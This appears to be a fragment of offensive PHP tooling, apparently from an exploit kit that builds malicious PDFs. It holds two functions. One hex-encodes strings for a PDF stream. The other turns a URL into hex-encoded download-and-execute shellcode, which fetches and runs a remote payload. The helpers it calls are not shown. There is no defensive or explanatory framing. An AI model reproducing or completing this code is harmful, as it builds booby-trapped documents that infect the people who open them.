function pdf_ASCIIHexEncode($string) { return str_to_hex($string) . ">"; }
function shellcode_dl_exec_hex($url) { $shellcode = str_to_hex(uescape(shellcode_dl_exec($url))); return $shellcode; }